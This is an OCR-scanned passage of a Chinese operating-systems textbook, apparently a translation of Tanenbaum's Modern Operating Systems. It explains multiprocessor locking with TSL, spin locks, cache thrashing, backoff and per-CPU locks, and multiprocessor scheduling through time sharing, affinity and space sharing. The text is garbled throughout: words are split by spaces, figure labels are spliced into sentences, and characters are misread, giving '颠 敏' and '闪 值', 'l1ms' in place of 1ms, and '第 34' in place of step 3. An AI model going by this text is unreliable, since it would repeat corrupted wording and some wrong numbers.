大 多 数 的 现代 多 处 理 机 都 采用 这 种 管理 方式 。 为 这 类 机 器 编写 操作 系统 的 困难 ， 不 在 于 其 实际 的 代 
码 与 普通 的 操作 系统 有 多 大 的 不 同 ， 而 在 于 如 何 将 其 划分 为 可 以 由 不 同 的 CPU 并 行 执行 的 临界 区 而 互 不 
干扰 ， 即 使 以 细小 的 、 间 接 的 方式 。 另 外 ， 对 于 被 两 个 或 多 个 临界 区 使 用 的 表 必 须 通 过 互 斥 信号 量 分 别 
加 以 保护 ， 而 且 使 用 这 些 表 的 代码 必须 正确 地 运用 互 斥 信号 量 。 

更 进一步 ， 必 须 格外 小 心地 避免 死 锁 。 如 果 两 个 临界 区 都 需要 表 A 和 表 B， 其 中 一 个 首先 申请 A， 另 
一 个 首先 申请 B， 那 么 迟早 会 发 生死 锁 ， 而 且 没 有 人 知道 为 什么 会 发 生死 锁 。 理 论 上 ， 所 有 的 表 可 以 被 
赋予 整数 值 ， 而 且 所 有 的 临界 区 都 应 该 以 升序 的 方式 获得 表 。 这 一 策略 避免 了 死 锁 ， 但 是 需要 程序 员 非 
常 仔细 地 考虑 每 个 临界 区 需要 哪个 表 ， 以 便 按照 正确 的 次 序 安 排 请 求 。 

由 于 代码 是 随 着 时 间 演 化 的 ， 所 以 也 许 有 个 临界 区 需要 一 张 过 去 不 需要 的 新 表 。 如 果 程 序 员 是 新 接 
手工 作 的 ， 他 不 了 解 系统 的 整个 逻辑 ， 那 么 可 能 只 是 在 他 需要 的 时 候 获 得 表 ， 并 且 在 不 需要 时 释放 掉 。 
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尽管 这 看 起 来 是 合理 的 ， 但 是 可 能 会 导致 死 锁 ， 即 用 户 会 觉察 到 系统 被 凝固 住 了 。 要 做 正确 并 不 容易 ， 
而 且 要 在 程序 员 不 断 更 换 的 数 年 时 间 之 内 始终 保持 正确 性 太 困难 了 。 


8.1.3 多 处 理 机 同步 

在 多 处 理 机 中 CPU 经 常 需要 同步 。 这 里 刚刚 看 到 了 内 核 临 界 区 和 表 被 互 斥 信号 量 保护 的 情形 。 现 在 
让 我 们 仔细 看 看 在 多 处 理 机 中 这 种 同步 是 如 何 工 作 的 。 正 如 我 们 将 看 到 的 ， 它 远 不 是 那么 无 足 轻重 。 

开始 讨论 之 前 ， 还 需要 引入 同步 原 语 。 如 果 一 个 进程 在 单 处 理 机 ( 仅 含 一 个 CPU) 中 需要 访问 一 些 
内 核 临 界 表 的 系统 调用 ， 那 么 内 核 代 码 在 接触 该 表 之 前 可 以 先 禁止 中 断 。 然 后 它 继续 工作 ， 在 相关 工作 
完成 之 前 ， 不 会 有 任何 其 他 的 进程 溜 进来 访问 该 表 。 在 多 处 理 机 中 ， 禁 止 中 断 的 操作 只 影响 到 完成 禁止 
中 断 操 作 的 这 个 CPU， 其 他 的 CPU 继续 运行 并 且 可 以 访问 临界 表 。 因 此 ， 必 须 采 用 一 种 合适 的 互 斥 信号 
量 协议 ， 而 且 所 有 的 CPU 都 遵守 该 协议 以 保证 互 斥 工作 的 进行 。 

任何 实用 的 互 斥 信号 量 协议 的 核心 都 是 一 条 特殊 指令 ， 该 指令 允许 检测 一 个 存储 器 字 并 以 一 种 不 可 
见 的 操作 设置 。 我 们 来 看 看 在 图 2-22 中 使 用 的 指令 TSL (Test and Set Lock) 是 如 何 实现 临界 区 的 。 正 如 
我 们 先前 讨论 的 ， 这 条 指令 做 的 是 ， 读 出 一 个 存储 器 字 并 把 它 存 储 在 一 个 寄存 器 中 。 同 时 ， 它 对 该 存储 
器 字 写 入 一 个 1 (或 某 些 非 零 值 ) 。 当 然 ， 这 需要 两 个 总 线 周 期 来 完成 存储 器 的 读 写 。 在 单 处 理 机 中 ， 只 
要 该 指令 不 被 中 途中 断 ，TSL 指 令 就 始终 照常 工作 。 

现在 考虑 在 一 个 多 处 理 机 中 发 生 
的 情况 。 在 图 8-10 中 我 们 看 到 了 最 坏 CPU1 1000} 存储 器 CPU2 
情况 的 时 序 ， 其 中 存储 器 字 1000， 被 初始 化 为 0 
用 作 一 个 初始 化 为 0 的 锁 。 第 1 步 ， 
CPU 1 读 出 该 字 得 到 一 个 0。 第 2 步 ， 
在 CPU 1 有 机 会 把 该 字 写 为 1 之 前 ， 
CPU 2 进入 ， 并 且 也 读 出 该 字 为 0。 第 
34, CPU 1 把 1 写 入 该 字 。 第 4 步 ， 总 线 
CPU ?也 把 1 写 人 该 字 。 两 个 CPU 都 由 ”图 8-10 如 果 不 能 锁 住 总 线 ，TSL 指 令 会 失效 。 这 里 的 四 步 解释 了 
TSL 指 令 得 到 0， 所 以 两 者 都 对 临界 失效 情况 
区 进行 访问 ， 并 且 互 斥 失 败 。 

为 了 阻止 这 种 情况 的 发 生 ; TSL 指 令 必 须 首先 锁 住 总 线 ， 阻 止 其 他 的 CPU 访问 它 ， 然 后 进行 存储 器 的 
读 写 访问 ， 再 解锁 总 线 。 对 总 线 加 锁 的 典型 做 法 是 ， 先 使 用 通常 的 总 线 协 议 请 求 总 线 ， 并 申明 (设置 一 个 
逻辑 值 1) 已 拥有 某 些 特定 的 总 线 线路 ， 直 到 两 个 周期 全 部 完成 。 只 要 始终 保持 拥有 这 一 特定 的 总 线 线路 ， 
那么 其 他 CPU 就 不 会 得 到 总 线 的 访问 权 。 这 个 指令 只 有 在 拥有 必要 的 线路 和 和 使 用 它们 的 (硬件 ) 协议 上 
才能 实现 。 现 代 总 线 都 有 这 些 功 能 ， 但 是 早期 的 一 些 总 线 不 具备 ， 它 们 不 能 正确 地 实现 TSL 指 令 。 这 就 是 
Peterson 协议 (完全 用 软件 实现 同步 ) 会 产生 的 原因 (Peterson, 1981), 

如 果 正 确 地 实现 和 使 用 TSL， 它 能 够 保证 互 斥 机 制 正 常 工作 。 但 是 这 种 互 斥 方法 使 用 了 自 旋 锁 
(spin lock) ， 因 为 请 求 的 CPU 只 是 在 原 地 尽 可 能 快 地 对 锁 进行 循环 测试 。 这 样 做 不 仅 完全 浪费 了 提出 请 
求 的 各 个 CPU 的 时 间 ， 而 且 还 给 总 线 或 存储 器 增加 了 大 量 的 负载 ， 严 重地 降低 了 所 有 其 他 CPU 从 事 正 常 
工作 的 速度 。 

乍 一 看 ， 高 速 缓存 的 实现 也 许 能 够 消除 总 线 竞 争 的 问题 ， 但 事实 并 非 如 此 。 理 论 上 ， 只 要 提出 请 求 
的 CPU 已 经 读 取 了 锁 字 (lock word) ， 它 就 可 在 其 高 速 缓存 中 得 到 一 个 副本 。 只 要 没有 其 他 CPU 试图 使 
用 该 锁 ， 提 出 请 求 的 CPU 就 能 够 用 完 其 高 速 缓存 。 当 拥有 锁 的 CPU 写 和 人 一 个 0 高 速 缓存 并 释放 它 时 ， 高 
速 缓存 协议 会 自动 地 将 它 在 远程 高 速 缓存 中 的 所 有 副本 失效 ， 要 求 再 次 读 取 正确 的 值 。 

问题 是 , 高 速 缓 存 操作 是 在 32 或 64 字 节 的 块 中 进行 的 。 通常 ,拥有 锁 的 CPU 也 需要 这 个 锁 周围 的 字 。 
由 于 TSL 指 令 是 一 个 写 指令 (因为 它 修改 了 锁 )， 所 以 它 需 要 互 斥 地 访问 含有 锁 的 高 速 缓存 块 。 这 样 ， 
每 一 个 TSL 都 使 锁 持 有 者 的 高 速 缓存 中 的 块 失效 ， 并 且 为 请 求 的 CPU 取 一 个 私有 的 、 唯 一 的 副本 。 只 要 
锁 拥 有 者 访问 到 该 锁 的 邻接 字 ， 该 高 速 缓存 块 就 被 送 进 其 机 器 。 这 样 一 来 ， 整 个 包含 锁 的 高 速 缓存 块 就 
会 不 断 地 在 锁 的 拥有 者 和 锁 的 请 求 者 之 间 来 回 穿梭 ， 导 致 了 比 单个 读 取 一 个 锁 字 更 大 的 总 线 流量 。 







2.CPU2 读 一 个 0 





1.CPU 1 读 一 个 0 





3.CPU 1 写 一 个 1 4. CPU 2 写 一 个 1 
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如 果 能 消除 在 请 求 一 侧 的 所 有 由 TSL 引 起 的 写 操作 ， 就 可 以 明显 地 减少 这 种 开销 。 使 提出 请 求 的 
CPU 首 先进 行 一 个 纯 读 操作 来 观察 锁 是 否 空间 ， 就 可 以 实现 这 个 目标 。 只 有 在 锁 看 来 是 空 闪 时 ，TSL 才 
真正 去 获取 它 。 这 种 小 小 变化 的 结果 是 ， 大 多 数 的 行为 变 成 读 而 不 是 写 。 如 果 拥 有 锁 的 CPU 只 是 在 同一 
个 高 速 缓存 块 中 读 取 各 种 变量 ， 那 么 它们 每 个 都 可 以 以 共享 只 读 方式 拥有 一 个 高 速 缓存 块 的 副本 ， 这 就 
消除 了 所 有 的 高 速 缓 存 块 传送 。 当 锁 最 终 被 释放 时 ， 锁 的 所 有 者 进行 写 操作 ， 这 需要 排他 访问 ， 也 就 使 
远程 高 速 缓存 中 的 所 有 其 他 副本 失效 。 在 提出 请 求 的 CPU 的 下 一 个 读 请 求 中 ,高 速 缓存 块 会 被 重新 装载 。 
注意 ， 如 果 两 个 或 更 多 的 CPU 竞争 同一 个 锁 ， 那 么 有 可 能 出 现 这 样 的 情况 ， 两 者 同时 看 到 锁 是 空闲 的 ， 
于 是 同时 用 TSL 指 令 去 获得 它 。 只 有 其 中 的 一 个 会 成 功 ， 所 以 这 里 没有 竞争 条 件 ， 因 为 真正 的 获取 是 由 
TSL 指 令 进 行 的 ， 而 且 这 条 指令 是 原子 性 的 。 即 使 看 到 了 锁 空闲 ， 然 后 立即 用 TSL 指 令 试 图 获得 它 ， 也 
不 能 保证 真正 得 到 它 。 其 他 CPU 可 能 会 取胜 ， 不 过 对 于 该 算法 的 正确 性 来 说 ， 谁 得 到 了 锁 并 不 重要 。 纯 
读 出 操作 的 成 功 只 是 意味 着 这 可 能 是 一 个 获得 锁 的 好 时 机 ， 但 并 不 能 确保 能 成 功 地 得 到 锁 。 

另 一 个 减少 总 线 流量 的 方式 是 使 用 著名 的 以 太 网 二 进 制 指 数 回 退 算法 (binary exponential backoff 
algorithm) (Anderson，1990)。 不 是 采用 连续 轮 询 ， 参 考 图 2-25， 而 是 把 一 个 延迟 循环 插入 轮 询 之 间 。 
初始 的 延迟 是 一 条 指令 。 如 果 锁 仍然 忙 ， 延 迟 被 加 倍 成 为 两 条 指令 ， 然 后 ， 四 条 指令 ， 如 此 这 样 进行 ， 
直到 某 个 最 大 值 。 当 锁 释放 时 ， 较 低 的 最 大 值 会 产生 快速 的 响应 。 但 是 会 浪费 较 多 的 总 线 周期 在 高 速 组 
存 的 颠 租 上 。 而 较 高 的 最 大 值 可 减少 高 速 缓存 的 颠 敏 ,， 但 是 其 代价 是 不 会 注意 到 锁 如 此 迅速 地 成 为 空闲 。 
二 进 制 指数 补偿 算法 无 论 在 有 或 无 TSL 指 令 前 的 纯 读 的 情况 下 都 适用 。 

一 个 更 好 的 想法 是 ， 让 每 个 打算 获 
得 互 斥 信号 量 的 CPU 都 拥有 各 自用 于 测 OPUS 
试 的 私有 锁 变 量 ， 如 图 8-11 所 示 Cpu 2 在 这 个 (私有 ) 
(Mellor-Crummey 和 Scott，1991) 。 有 关 锁 上 轮转 
的 变量 应 该 存放 在 未 使 用 的 高 速 缓存 块 中 
以 避免 冲突 。 对 这 种 算法 的 描述 如 下 : 给 
一 个 未 能 获得 锁 的 CPU 分 配 一 个 锁 变量 并 
且 把 它 附 在 等 待 该 锁 的 CPU 链表 的 末端 。 共享 存储 器 — 
在 当前 锁 的 持 有 者 退出 临界 区 时 。 它 释放 
链表 中 的 首 个 CPU 正在 测试 的 私有 锁 (在 
自己 的 高 速 缓存 中 ) 。 然 后 该 CPU 进入 临 
界 区 。 操 作 完 成 之 后 ， 该 CPU 释放 锁 。 其 图 8-11 使 用 多 个 锁 以 防止 高 速 缓存 颠 繁 
后 继 者 接着 使 用 ， 以 此 类 推 。 尽 管 这 个 协 
议 有 些 复杂 (为 了 避免 两 个 CPU 同 时 把 它们 自己 加 在 链表 的 末端 )， 但 它 能 够 有 效 工 作 ， 而 且 消 除了 饥 
饿 问题 。 具 体 细节 ， 读 者 可 以 参考 有 关 论 文 。 

自 旋 与 切换 

到 目前 为 止 ， 不论 是 连续 轮 询 方式 、 间 吹 轮 询 方式 ， 还 是 把 自己 附 在 进行 等 候 CPU 链 表 中 的 方式 ， 
我 们 都 假定 需要 加 锁 的 互 斥 信号 量 的 CPU 只 是 保持 等 待 。 有 时 对 于 提出 请 求 的 CPU 而 言 ， 只 有 等 待 ， 不 
存在 其 他 替代 的 办 法 。 例 如 ， 假 设 一些 CPU 是 空闲 的 ， 需 要 访问 共享 的 就 绪 链表 (ready list) 以 便 选择 
一 个 进程 运行 。 如 果 就 绪 链 表 被 锁 住 了 ， 那 么 CPU 就 不 能 只 是 暂停 其 正在 进行 的 工作 ， 而 去 运行 另 一 个 
进程 ， 因 为 这 样 做 需要 访问 就 绪 链表 。CPU 必 须 保持 等 待 直 到 能 够 访问 该 就 绪 链 表 。 

然而 ， 在 另外 一 些 情形 中 ， 却 存在 着 别 的 选择 。 例 如 ， 如 果 在 一 个 CPU 中 的 某 些 线程 需要 访问 文件 系 
统 缓冲 区 高 速 缓存 ， 而 该 文件 系统 缓冲 区 高 速 缓存 正好 锁 住 了 ， 那 么 CPU 可 以 决定 切换 至 另外 一 个 线程 而 
不 是 等 待 。 有 关 是 进行 自 旋 还 是 进行 线程 切换 的 问题 则 是 许多 研究 课题 的 内 容 ， 下 面 会 讨论 其 中 的 一 部 分 。 
请 注意 ， 这 类 问题 在 单 处 理 机 中 是 不 存在 的 ， 因 为 没有 另 一 个 CPU 释放 锁 ， 那 么 自 旋 就 没有 任何 意义 。 如 
， 果 一 个 线程 试图 取得 锁 并 且 失 败 ， 那 么 它 总 是 被 阻塞 ， 这 样 锁 的 所 有 者 有 机 会 运行 和 释放 该 锁 。 

假设 自 旋 和 进行 线程 切换 都 是 可 行 的 选择 ， 则 可 进行 如 下 的 权衡 。 自 旋 直接 浪费 了 CPU 周期 。 重 复 
地 测试 锁 并 不 是 高 效 的 工作 。 不 过 ， 切 换 也 浪费 了 CPU 周期 ， 因 为 必须 保存 当前 线程 的 状态 ， 必 须 获 得 








CPU 4 在 这 个 (私有 ) 
锁 上 轮转 


当 CPU 1 在 实际 锁 上 完 
成 时 ， 它 释放 该 锁 ， 同 
时 也 释放 CPU 2 正在 其 
上 轮转 的 私有 锁 


CPU 1 持 有 实际 锁 
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保护 就 绪 链 表 的 锁 ， 还 必须 选择 一 个 线程 ， 必 须 装 人 其 状态 ， 并 且 使 其 开始 运行 。 更 进一步 来 说 ， 该 
CPU 高 速 缓存 还 将 包含 所 有 不 合适 的 高 速 缓存 块 ， 因 此 在 线程 开始 运行 的 时 候 会 发 生 很 多 代价 昂贵 的 高 
速 缓存 未 命中 。TLB 的 失效 也 是 可 能 的 。 最 后 ， 会 发 生 返 回 至 原来 线程 的 切换 ， 随 之 而 来 的 是 更 多 的 高 
速 缓存 未 命中 。 花 费 在 这 两 个 线程 间 来 回 切换 和 所 有 高 速 缓存 未 命中 的 周期 时 间 都 浪费 了 。 

如 果 预 先知 道 互 斥 信号 量 通常 被 持 有 的 时 间 ， 比 如 是 50us ， 而 从 当前 线程 切换 需要 lms， 稍 后 切换 
返回 还 需 l1ms， 那 么 在 互 斥 信号 量 上 自 旋 则 更 为 有 效 。 另 一 方面 ， 如 果 互 斥 信号 量 的 平均 保持 时 间 是 
10ms， 那 就 值得 忍受 线程 切换 的 麻烦 。 问 题 在 于 ， 临 界 区 在 这 个 期 间 会 发 生 相 当 大 的 变化 ， 所 以 ， 哪 一 
种 方法 更 好 些 呢 ? 

有 一 种 设计 是 总 是 进行 自 旋 。 第 二 种 设计 方案 则 总 是 进行 切换 。 而 第 三 种 设计 方案 是 每 当 遇 到 一 个 
锁 住 的 互 斥 信号 量 时 ， 就 单独 做 出 决定 。 在 必须 做 出 决定 的 时 刻 ， 并 不 知道 自 旋 和 切换 哪 一 种 方案 更 好 ， 
但 是 对 于 任何 给 定 的 系统 ， 有 可 能 对 其 所 有 的 有 关 活动 进行 跟踪 ， 并 且 随 后 进行 离线 分 析 。 然 后 就 可 以 
确定 哪个 决定 最 好 及 在 最 好 情形 下 所 浪费 的 时 间 。 这 种 事后 算法 (hindsight algorithm) 成 为 对 可 行 算法 
进行 测量 的 基准 评测 标准 。 

已 有 研究 人 员 对 上 述 这 一 问题 进行 了 很 长 时 间 的 研究 (Ousterhout，1982)。 多 数 的 研究 工作 使 用 了 
这 样 一 个 模型 ， 一 个 未 能 获得 互 斥 信号 量 的 线程 自 旋 一 段 时 间 。 如 果 时 间 超 过 某 个 闪 值 ， 则 进行 切换 。 
在 某 些 情 形 下 ， 该 阔 值 是 一 个 定 值 ， 典 型 值 是 切换 至 另 一 个 线程 再 切换 回来 的 开销 。 在 另 一 些 情形 下 ， 
该 装 值 是 动态 变化 的 ， 它 取决 于 所 观察 到 的 等 待 互 斥 信号 量 的 历史 信息 。 

在 系统 跟踪 若干 最 新 的 自 旋 时 间 并 且 假定 当前 的 情形 可 能 会 同 先前 的 情形 类 似 时 ， 就 可 以 得 到 最 好 
的 结果 。 例 如 ， 假 定 还 是 1ms 切 换 时 间 ， 线 程 自 旋 时 间 最 长 为 2ms， 但 是 要 观察 实际 上 自 旋 了 多 长 时 间 。 
如 有 果 线 程 未 能 获取 锁 ， 并 且 发 现在 之 前 的 三 轮 中 ， 平 均等 待 时 间 为 200us， 那 么 ， 在 切换 之 前 就 应 该 先 
自 旋 2ms。 但 是 ， 如 果 发 现在 先前 的 每 次 尝试 中 ， 线 程 都 自 旋 了 整整 2ms， 则 应 该 立即 切换 而 不 再 自 旋 。 

一 些 现代 的 处 理 器 《包括 x86) 提供 特殊 的 指令 使 等 待 过 程 更 高 效 ， 以 降低 功 耗 。 例 如 ，x86 上 的 
MONITOR / MWAIT 指 令 允许 程序 阻塞 ， 直 到 某 个 其 他 处 理 器 修改 先前 定义 的 存储 器 区 域 中 的 数据 。 具 
体 来 说 ，MONITOR 指 令 定义 了 应 该 对 写 入 操作 进行 监视 的 地 址 范围 。 然 后 ，MWAIT 指 令 会 阻塞 线程 直 
到 有 人 写 和 该 区 域 。 阻 塞 时 ， 线 程 会 进行 自 旋 ， 但 不 会 浪费 太 多 时 钟 周期 。 


8.1.4 多 处 理 机 调度 

在 探讨 多 处 理 机 调度 之 前 ， 需 要 确定 调度 的 对 象 是 什么 。 过 去 ， 当 所 有 进程 都 是 单个 线程 的 时 候 ， 
调度 的 单位 是 进程 ， 因 为 没有 其 他 什么 可 以 调度 的 。 所 有 的 现代 操作 系统 都 支持 多 线程 进程 ， 这 让 调度 
变 得 更 加 复杂 。 

线程 是 内 核 线程 还 是 用 户 线程 至 关 重 要 。 如 果 线 程 是 由 用 户 空间 库 维护 的 ， 而 对 内 核 不 可 见 ， 那 么 
调度 一 如 既往 的 基于 单个 进程 。 如 果 内 核 并 不 知道 线程 的 存在 ， 它 就 不 能 调度 线程 。 

对 内 核 线程 来 说 ， 情 况 有 所 不 同 。 在 这 种 情况 下 所 有 线程 均 是 内 核 可 见 的 ， 内 核 可 以 选择 一 个 进程 
的 任 一 线程 。 在 这 样 的 系统 中 ， 发 展 趋势 是 内 核 选择 线程 作为 调度 单位 ， 线 程 从属 的 那个 进程 对 于 调度 
算法 只 有 很 少 的 (乃至 没有 ) 影响 。 下 面 我 们 将 探讨 线程 调度 ， 当 然 ， 对 于 一 个 单线 程 进程 (single- 
threaded process) 系统 或 者 用 户 空间 线程 ， 调 度 单位 依然 是 进程 。 

进程 和 线程 的 选择 并 不 是 调度 中 的 唯一 问题 。 在 单 处 理 机 中 ,调度 是 一 维 的 。 唯 一 必须 (不断 重复 地 ) 
回答 的 问题 是 :“ 接 下 来 运行 的 线程 应 该 是 哪 一 个 ? ”而 在 多 处 理 机 中 ， 调 度 是 二 维 的 。 调 度 程序 必须 决 
定 哪 一 个 进程 运行 以 及 在 哪 一 个 CPU 上 运行 。 这 个 在 多 处 理 机 中 增加 的 维 数 大 大 增加 了 调度 的 复杂 性 。 

另 一 个 造成 复杂 性 的 因素 是 ， 在 有 些 系统 中 所 有 的 线程 是 不 相关 的 ， 它 们 属于 不 同 的 进程 ， 彼 此 无 
关 。 而 在 另外 一 些 系统 中 它们 是 成 组 的 ， 同 属于 同一 个 应 用 并 且 协 同 工 作 。 前 一 种 情形 的 例子 是 服务 器 
系统 ， 其 中 独立 的 用 户 运行 相互 独立 的 进程 。 这 些 不 同 进程 的 线程 之 间 没 有 关系 ， 因 此 其 中 的 每 一 个 都 
可 以 独立 调度 而 不 用 考虑 其 他 的 线程 。 

后 一 种 情形 通常 出 现在 程序 开发 环境 中 。 大 型 系统 中 通常 有 一 些 供 实 际 代码 使 用 的 包含 宏 、 类 型 定 
义 以 及 变量 声明 等 内 容 的 头 文件 。 当 一 个 头 文件 改变 时 ， 所 有 包含 它 的 代码 文件 必须 被 重新 编译 。 通 常 
make 程 序 用 于 管理 开发 工作 。 调 用 make 程 序 时 ， 在 考虑 了 头 文件 或 代码 文件 的 修改 之 后 ， 它 仅 编译 那 
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些 必须 重新 编译 的 代码 文件 。 仍 然 有 效 的 目标 文件 不 再 重新 生成 。 

make 的 原始 版 本 是 顺序 工作 的 ， 不 过 为 多 处 理 机 设计 的 新 版 本 可 以 一 次 启动 所 有 的 编译 。 如 果 需 
要 10 个 编译 ， 那 么 迅速 对 9 个 进行 调度 而 让 最 后 一 个 在 很 长 的 时 间 之 后 才 进 行 的 做 法 没有 多 大 意义 ， 
为 直到 最 后 一 个 线程 完成 之 后 用 户 才 感觉 到 所 有 工作 完成 了 。 在 这 种 情况 下 ， 将 进行 编译 的 线程 看 作 一 
组 ， 并 在 对 其 调度 时 考虑 到 这 一 点 是 有 意义 的 。 

从 生产 者 -消费 者 的 角度 看 ， 有 时 将 大 量 通信 的 进程 调度 到 相同 时 间 和 相近 空间 是 非常 有 用 的 。 例 
如 ， 它 们 可 能 受益 于 共享 缓存 。 同 样 ， 在 NUMA 架 构 中 ， 如 果 访 问 靠近 的 内 存 ， 可 能 会 有 益处 。 

1. 分 时 

让 我 们 首先 讨论 调度 独立 线程 的 情况 。 稍 后 ， 我 们 将 考虑 如 何 调度 相关 联 的 多 个 线程 。 处 理 独立 线 
程 的 最 简单 算法 是 ， 为 就 绪 线程 维护 一 个 系统 级 的 数据 结构 ， 它 可 能 只 是 一 个 链表 ， 但 更 多 的 情况 下 可 
能 是 对 应 不 同 优 先 级 一 个 链表 集合 ， 如 图 8-12a 所 示 。 这 里 16 个 CPU 正在 忙碌 ， 有 不 同 优先 级 的 14 个 线 
程 在 等 待 运行 。 第 一 个 将 要 完成 其 当前 工作 (或 其 线程 将 被 阻塞 ) 的 CPU 是 CPU 4， 然 后 CPU 4 锁 住 调 
度 队列 (scheduling queue) 并 选择 优先 级 最 高 的 线程 A， 如 图 8-12b 所 示 。 接 着 ，CPU 12 空闲 并 选择 线 
程 B ， 参 见 图 8-12c。 只 要 线程 完全 无 关 ， 以 这 种 方式 调度 是 明智 的 选择 并 且 其 很 容易 高 效 地 实现 。 
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图 8-12 使 用 单一 数据 结构 调度 一 个 多 处 理 机 


由 所 有 CPU 使 用 的 单个 调度 数据 结构 分 时 共享 这 些 CPU， 正 如 它们 在 一 个 单 处 理 机 系统 中 那样 。 它 
还 支持 自动 负载 平衡 ， 因 为 决 不 会 出 现 一 个 CPU 空闲 而 其 他 CPU 过 载 的 情况 。 不 过 这 一 方法 有 两 个 缺点 ， 
一 个 是 随 着 CPU 数量 增加 所 引起 的 对 调度 数据 结构 的 潜在 竞争 ， 二 是 当 线 程 由 于 IO 阻塞 时 所 引起 上 下 
文 切换 的 开销 (overhead ) 。 

在 线程 的 时 间 片 用 完 时 ， 也 可 能 发 生 上 下 文 切换 。 在 多 处 理 机 中 它 有 一 些 在 单 处 理 机 中 不 存在 的 属 
性 。 假 设 某 个 线程 在 其 时 间 片 用 完 时 恰好 持 有 一 把 自 旋 锁 ， 在 该 线程 被 再 次 调度 并 且 释 放 该 锁 之 前 ， 其 
他 等 待 该 自 旋 锁 的 CPU 只 是 把 时 间 浪 费 在 自 旋 上 。 在 单 处 理 机 中 ， 极 少 采用 自 旋 锁 ， 因 此 ， 如 果 持 有 互 
斥 信号 量 的 一 个 线程 被 挂 起 ， 而 另 一 个 线程 启动 并 试图 获取 该 互 斥 信号 量 ， 则 该 线程 会 立即 被 阻塞 ， 这 
样 只 浪费 了 少量 时 间 。 

为 了 避免 这 种 异常 情况 ， 一 些 系 统 采用 智能 调度 (smart scheduling) 的 方法 ， 其 中 ， 获 得 了 自 旋 锁 
的 线程 设置 一 个 进程 范围 内 的 标志 以 表示 它 目前 拥有 了 一 个 自 旋 锁 (Zahorjan 等 人 ，1991)。 当 它 释放 
该 自 旋 锁 时 ， 就 清除 这 个 标志 。 这 样 调度 程序 就 不 会 停止 持 有 自 旋 锁 的 线程 ， 相 反 ， 调 度 程序 会 给 予 稍 
微 多 一 些 的 时 间 让 该 线程 完成 临界 区 内 的 工作 并 释放 自 旋 锁 。 

调度 中 的 另 一 个 主要 问题 是 ， 当 所 有 CPU 平等 时 ， 某 些 CPU 更 平等 。 特 别 是 ， 当 线程 A 已 经 在 CPU 
k 上 运行 了 很 长 一 段 时 间 时 ，CPU k 的 高 速 缓存 装 满 了 A 的 块 。 若 A 很 快 重新 开始 运行 ， 那 么 如 果 它 在 
CPU k 上 运行 性 能 可 能 会 更 好 一 些 ， 因 为 的 高 速 缓存 也 许 还 存 有 A 的 一 些 块 。 预 装 高 速 缓存 块 将 提高 高 
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速 缓存 的 命中 率 ， 从 而 提高 了 线程 的 速度 。 另 外 ，TLB 也 可 能 含有 正确 的 页 面 ， 从 而 减少 了 TLB 失 效 。 

:有些 多 处 理 机 考虑 了 这 一 因素 ， 并 使 用 了 所 谓 亲 和 调度 (affinity scheduling) (Vaswani 和 Zahorjan， 
1991) 。 其 基本 思想 是 ， 尽 量 使 一 个 线程 在 它 前 一 次 运行 过 的 同一 个 CPU 上 运行 。 创 建 这 种 亲和力 
(affinity) 的 一 种 途径 是 采用 一 种 两 级 调度 算法 (two-level scheduling algorithm ) 。 在 一 个 线程 创建 时 ， 
它 被 分 给 一 个 CU， 例如， 可 以 基于 哪 一 个 CPU 在 此 刻 有 最 小 的 负载 。 这 种 把 线程 分 给 CPU 的 工作 在 算 
法 的 顶层 进行 ， 其 结果 是 每 个 CPU 获得 了 自己 的 线程 集 。 

线程 的 实际 调度 工作 在 算法 的 底层 进行 。 它 由 每 个 CPU 使 用 优先 级 或 其 他 的 手段 分 别 进行 。 通 过 试 
图 让 一 个 线程 在 其 生命 周期 内 在 同一 个 CPU 上 运行 的 方法 ， 高 速 缓存 的 亲和力 得 到 了 最 大 化 。 不 过 ， 如 
果 某 一 个 CPU 没有 线程 运行 ， 它 便 选 取 另 一 个 CPU 的 一 个 线程 来 运行 而 不 是 空转 。 

两 级 调度 算法 有 三 个 优点 。 第 一 ， 它 把 负载 大 致 平均 地 分 配 在 可 用 的 CPU 上 ， 第 二 ， 它 尽 可 能 发 挥 
了 高 速 缓存 亲和力 的 优势 ;第 三 ， 通 过 为 每 个 CPU 提供 一 个 私有 的 就 绪 线程 链表 ， 使 得 对 就 绪 线程 链表 
的 竞争 减 到 了 最 小 ， 因为 试图 使 用 另 一 个 CPU 的 就 绪 线程 链表 的 机 会 相对 较 小 。 

2. 空间 共享 

当 线 程 之 间 以 某 种 方式 彼此 相关 时 ， 可 以 使 用 其 他 多 处 理 机 调度 方法 。 前 面 我 们 叙述 过 的 并 行 
make 就 是 一 个 例子 。 经 常 还 有 一 个 线程 创建 多 个 共同 工作 的 线程 的 情况 发 生 。 例 如 当 一 个 进程 的 多 个 线 
程 间 频繁 地 进行 通信 ， 让 其 在 同一 时 间 执 行 就 显得 尤为 重要 。 在 多 个 CPU 上 同时 调度 多 个 线程 称 为 空间 
共享 (space sharing), 

最 简单 的 空间 共享 算法 是 这 样 工 作 的 。 假 设 一 组 相关 的 线程 是 一 次 性 创建 的 。 在 其 创建 的 时 刻 ， 调 
度 程序 检查 是 否 有 同 线程 数量 一 样 多 的 空 辣 CPU 存 在 。 如 果 有 ， 每 个 线程 获得 各 自 专 用 的 CPU ( 非 多 道 
程序 处 理 ) 并 且 都 开始 运行 。 如 果 没 有 足够 的 CPU ， 就 没有 线程 开始 运行 ， 直 到 有 足够 的 CPU 时 为 止 。 
每 个 线程 保持 其 CPU 直 到 它 终 止 ， 并且 该 CPU 被 送 回 可 用 CPU 池 中 。 如 果 一 个 线程 在 1O 上 阻塞 ， 它 继续 
保持 其 CPU， 而 该 CPU 就 空闲 直到 该 线程 被 唤醒 。 在 下 一 批 线程 出 现时 ， 应 用 同样 的 算法 。 

在 任何 一 个 时 刻 ,， 全 部 CPU 被 静态 地 划分 成 若干 个 分 区 , 每 个 分 区 都 运行 一 个 进程 中 的 线程 。 例 如 ， 
在 图 8-13 中 ， 分 区 的 大 小 是 4、6、8 和 12 个 





We 个 
CPU， 有 两 个 CPU 没 有 分 配 。 随 着 时 间 的 流 oes 
逝 ， 新 的 线程 创建 ， 旧 的 线程 终止 ，CPU 分 pk 


区 大 小 和 数量 都 会 发 生变 化 。 

每 隔 一 定 的 周期 ， 系 统 就 必须 做 出 调 m: I 
度 决策 。 在 单 处 理 机 系统 中 ， 最 短 作 业 优 先 7 Seer stint ikad 
是 批 处 理 调度 中 知名 的 算法 。 在 多 处 理 机 系 未 分 配 的 CPU 12 个 CPU 的 分 区 
间 最 小 的 线程 为 候选 线程 。 然 而 ， 在 实际 中 ， 这 一 信息 很 难得 到 ， 因 此 该 算法 难以 实现 。 事 实 上 ,研究 
表明 ， 要 胜 过 先 来 先 服 务 算法 是 非常 困难 的 (Krueger 等 人 ，1994)。 

